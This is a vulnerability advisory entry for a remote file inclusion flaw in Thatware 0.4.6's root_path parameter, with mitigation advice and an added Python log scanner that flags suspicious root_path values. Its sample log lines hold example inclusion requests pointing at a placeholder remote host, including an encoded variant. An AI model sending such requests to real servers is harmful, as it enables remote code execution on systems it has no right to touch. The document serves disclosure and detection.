Vendor: Thatware
By: Drago84
CVSS: 9.3 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: Thatware
Affected Version From: 0.4.6
Affected Version To: 0.4.6
Patch Exists: YES
Related CWE: N/A
CPE: thatware
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Thatware 0.4.6 (root_path) Remote File Inclusion
Thatware 0.4.6 is vulnerable to remote file inclusion through the root_path parameter. An attacker can exploit it by sending a crafted HTTP request to the vulnerable server in which root_path contains a URL pointing to a malicious file hosted on a remote server. The vulnerable server then executes that file, allowing the attacker to gain access to the server.
Mitigation:
The best way to mitigate this vulnerability is to validate and sanitize user input, including the root_path parameter, before the application uses it. Additionally, configure the application so that it can access only the files it needs to function.
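
A log check for the request pattern described above, as an added example that is not part of the original advisory: it scans web access logs for root_path values that carry a URL scheme or a protocol-relative host, decoding repeated percent-encoding first. The log format, client addresses, hosts and paths are constructed sample data, and only query strings (not POST bodies) are visible to it.

```python
import re
from urllib.parse import parse_qsl, unquote

PARAM = "root_path"  # parameter named in the advisory
# A value starting with "scheme:" (http:, ftp:, php:, data:, ...), "//host" or a
# UNC prefix is not a plain local relative path and is worth an analyst's look.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format; all values are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /app/page.php?id=4 HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2006:10:00:05 +0000] "GET /app/page.php?root_path=http://files.example.net/x.txt HTTP/1.1" 200 90
192.0.2.12 - - [01/Jan/2006:10:00:09 +0000] "GET /app/page.php?root_path=includes/ HTTP/1.1" 200 700
192.0.2.13 - - [01/Jan/2006:10:00:12 +0000] "GET /app/page.php?root_path=%2568ttp%253A%252F%252Ffiles.example.net%252Fx HTTP/1.1" 200 90
192.0.2.14 - - [01/Jan/2006:10:00:20 +0000] "GET /app/page.php?root_path=//files.example.net/x HTTP/1.1" 404 0
"""


def fully_decode(value, max_rounds=5):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_remote_root_path(log_text):
    """Return (client, decoded value) for each request whose root_path looks remote."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        _, _, query = match.group("target").partition("?")
        # parse_qsl decodes once; fully_decode handles any further layers.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)
            if name == PARAM and REMOTE_RE.match(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in find_remote_root_path(SAMPLE_LOG):
        print(f"{client} sent {PARAM}={value!r}")
```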